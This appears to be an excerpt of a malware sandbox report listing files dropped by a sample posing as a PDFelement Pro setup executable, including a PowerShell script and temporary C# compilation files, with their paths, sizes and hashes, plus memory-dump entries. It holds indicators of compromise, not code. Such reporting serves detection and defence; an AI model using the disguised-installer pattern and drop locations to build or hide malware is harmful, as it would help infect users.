C:\Users\Admin\AppData\Local\Temp\wsduilib.log

Filesize
7KB

MD5
6f44d3fc2a598c12b3e30fbbf8865af6

SHA1
f992c05fb916fdbf93a85eba315c8d7cc16268d8

SHA256
03ce497e15f6624a6f5da482f5a25aeab1924753abe61d0211ecebd6d5523081

SHA512
852d7c80ac542741c20d8e53a25de1d8fca13864169911e153d030ffa6cd50361303fd3ed79fccb6b3dfbab8cb847032581b1ec9869eeae1abbac25e6f195a81

Download Submit
C:\Users\Admin\AppData\Roaming\p.ps1

Filesize
28KB

MD5
5201bec05304172eb34578a483da40da

SHA1
e4a91fd21e16639f759009a17e1f37df5c89f2b4

SHA256
5a2366fb3d365e87f77a982d83eefb5054d50e8e73d2043979e5616c7071a458

SHA512
7ea8de19029a90502fd6a472e1b449cdbf017a19e679d3383b34aea2af1e392de6216934640fd9d8c47fb8553759cde0880291ff2d187081ff9896746a276353

Download Submit
C:\Users\Admin\AppData\Roaming\pdfelement-pro_setup_full5239.exe

Filesize
1.2MB

MD5
a9e71619275adf3f7f063f0e5f1da31d

SHA1
7b60c38b1a04f46e946828d15f28dd77fcf310f7

SHA256
1e26938fcff220a294c03ed106068ab845d9c762f3adba926bf46c19f8ba49d6

SHA512
be4c24cdf620f2dbb661aaf715703acb597604e2092917d96da437e7eed5cb3c866bd3914b7cf40eab7cff6cb1e19e0c3b62ccb29abc2f6d8e2e9d2ad7f75f17

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE7FE.tmp

Filesize
652B

MD5
5f1ff59676bf4088e8ded80481c05252

SHA1
d93829e4be16abf6f287eeb49afb4c00f89eb93f

SHA256
4c4da80a2fa13ae4fa5d146473246a1ea083f5714aa0350cd50f6e9ddea7706c

SHA512
8fe4f26c5f0d4db0faa8ca6ca4496d6cbee4c45e74e721b6c4a0ba050476c5429fc1f55aefd256492841a905d250129de2312ba9b4ac839cb4166aa17b498b67

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gmm_htut.0.cs

Filesize
236B

MD5
dae076349c85f1ed8db78fd3bd75473c

SHA1
33be9fc7f764edae76f95fe28f452b740a75d809

SHA256
9e3f4a1c1286b86413b4844e216248f1a95e8a13ee74c2c71412c2d6c571f156

SHA512
ae396e869013c2c70936858646aeac2289b17c16a4f2a6b938d6d2434a30e9785e010ff3c42b9c728cd8c002ea4c8190783665f575e15962553eb7b229b9a923

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gmm_htut.cmdline

Filesize
309B

MD5
b037afbdc867d508fc1d65aba6d3e378

SHA1
2bfb87c31146a4c080d5020d206519ad57befe97

SHA256
4c6fdc0124922c6875b9b0b6191194dc64932b59dbe0a126f2f2dfd18657520d

SHA512
d4067550411d9295baa5af13cd1d0b3292f94f5402d4b039d6313d880d7994c63b69f33209abc76723da9d0b0418ecf6f19443b41c35092cb0c2804b4408bbe7

Download Submit
\Users\Admin\AppData\Local\Temp\MSIBD9D.tmp

Filesize
848KB

MD5
8636e27b4e9fe2e7d4ef7f77fe3ba1d2

SHA1
f1c7c604ad423ae6885a4df033440056a937e9c2

SHA256
5080ab5f709a25411f372c9d9d4fbcedb95d6a39334533815ab4eb975a43c74c

SHA512
dc509d0d1d279380b0c7b44dfc45d22d4ea22188672add296bde316efb4d7a7e0942944e072920df029e6f47fa6f251147179d67a5d747172fa2c3482208cd2e

Download Submit
memory/952-1130-0x0000000001D20000-0x0000000001D28000-memory.dmp

Filesize
32KB

Download
memory/952-737-0x000000001BC50000-0x000000001BF32000-memory.dmp

Filesize
2.9MB

Download
memory/952-1515-0x0000000002FF0000-0x0000000002FF8000-memory.dmp

Filesize
32KB

Download